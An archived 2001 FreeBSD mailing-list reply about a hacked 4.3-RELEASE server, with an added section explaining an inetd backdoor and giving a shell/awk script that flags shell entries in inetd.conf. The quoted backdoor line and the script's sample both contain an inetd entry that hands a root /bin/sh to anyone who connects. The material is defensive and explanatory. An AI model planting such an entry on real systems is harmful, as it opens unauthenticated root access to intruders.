Date:      Thu, 18 Oct 2001 13:38:22 -0700
From:      Kent Stewart <kstewart@owt.com>
To:        Tomek <tomek@mpionline.com>
Cc:        freebsd-questions@FreeBSD.ORG
Subject:   Re: I got hacked, I think
Message-ID:  <3BCF3DBE.C705892A@owt.com>
References:  <20011018131823.Y621-100000@jodie.ncptiddische.net> <011e01c157cf$9b401700$f6f073d1@mpionline.com> <20011018165057.V3734@ns2.wananchi.com> <01e701c157e4$f012abc0$f6f073d1@mpionline.com> <20011018180513.C3734@ns2.wananchi.com> <20011018114805.E70327@acadia.ne.mediaone.net> <018801c157ef$37ec0720$f6f073d1@mpionline.com> <03db01c15812$c4575d40$f6f073d1@mpionline.com>



Tomek wrote:
> 
> I found out more info.
> 
> -rw-r--r--   1 Broot  wheel       54 Sep 26 10:24 /inetd.conf
> -rw-r--r--   1 Broot  wheel    85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> -rw-------  1 Broot  wheel      4869 Sep 26 10:25 /etc/inetd.conf
> 
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream  tcp     nowait  root    /bin/sh sh -i
> 
> I take it that "sh" would not even request a login or anything if called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... how did he even log in the first time, maybe it was some
> buffer overflow or something.... yuck.

It began because you were using 4.3-release and you probably didn't fix
the security problems. There were several buffer overflow problems for
daemons that have been published for 4.3-r. The only solution in the case
of a hacked system has been to do a wipe and reinstall.

Kent

> 
> TY for all your help guys, you are all wonderful! I will leave you in
> peace now (I hope). I still don't know about Broot though...
> 

-- 
Kent Stewart
Richland, WA
http://users.owt.com/kstewart

Carl Sagan quote on Seti@home
http://setiathome.ssl.berkeley.edu/pale_blue_dot.html

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
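The /inetd.conf entry quoted above is a classic inetd backdoor: inetd accepts the connection and execs the named program with the socket as its stdin, stdout and stderr, so "/bin/sh sh -i" running as root hands anyone who connects an interactive root shell with no authentication at all. The entry borrows the name of the Kerberos encrypted-rlogin service (eklogin, 2105/tcp in /etc/services) so the listener looks legitimate in a port scan. The script below is an added example, not code from the thread or from FreeBSD, that scans an inetd.conf for entries whose server program or arguments are a shell, or whose program lives outside the usual libexec directories. The embedded sample inetd.conf is constructed to mimic the compromised host; the directory allow-list is an assumption and should be adjusted to the local layout.

```shell
#!/bin/sh
# Added example (not from the thread): flag inetd.conf entries that hand a
# socket directly to a shell, the pattern of the /inetd.conf backdoor above.
# inetd execs the program with the accepted socket as stdin/stdout/stderr, so
# "/bin/sh sh -i" run as root is an unauthenticated root shell on that port.

# Constructed sample inetd.conf (assumption: mimics the compromised host).
SAMPLE_INETD_CONF='# constructed sample inetd.conf
ftp      stream  tcp   nowait  root  /usr/libexec/ftpd     ftpd -l
telnet   stream  tcp   nowait  root  /usr/libexec/telnetd  telnetd
daytime  stream  tcp   nowait  root  internal
eklogin  stream  tcp   nowait  root  /bin/sh sh -i
shell    stream  tcp   nowait  root  /usr/libexec/rshd     rshd
'

# scan_inetd FILE ("-" for stdin): print one line per suspicious entry.
# Exit status 1 if anything was flagged, 0 if the file looks clean.
# Assumption: legitimate inetd servers live under /usr/libexec or
# /usr/local/libexec; "internal" marks inetd's built-in services.
scan_inetd() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }          # skip comments and blank lines
    {
        service = $1; user = $5; prog = $6
        args = ""
        for (i = 7; i <= NF; i++) args = args " " $i   # always starts with a space
        base = prog
        sub(/.*\//, "", base)                  # basename of the server program
        why = ""
        if (base ~ /^(sh|bash|csh|tcsh|ksh|zsh)$/)
            why = "server program is a shell"
        else if (args ~ / (sh|bash|csh|tcsh|ksh|zsh)( |$)/)
            why = "arguments invoke a shell"
        else if (prog != "internal" && prog !~ /^\/usr\/(local\/)?libexec\//)
            why = "program outside /usr/libexec or /usr/local/libexec"
        if (why != "") {
            found = 1
            printf "%s: %s (user=%s prog=%s%s)\n", service, why, user, prog, args
        }
    }
    END { if (found) exit 1; exit 0 }
    ' "$1"
}

# Demo on the embedded sample; on a live box run: scan_inetd /etc/inetd.conf
printf '%s' "$SAMPLE_INETD_CONF" | scan_inetd -
```

On the sample this prints only the eklogin line and exits 1. Two caveats a practitioner will want: once the intruder has root, awk, ls and the rest of the userland on the box cannot be trusted, so run any such check from a clean boot medium against the mounted disk; and a clean inetd.conf proves nothing on its own, since the same foothold can live in rc scripts, cron, a trojaned daemon or a kernel module, which is why Kent's advice to wipe and reinstall stands.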

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3BCF3DBE.C705892A>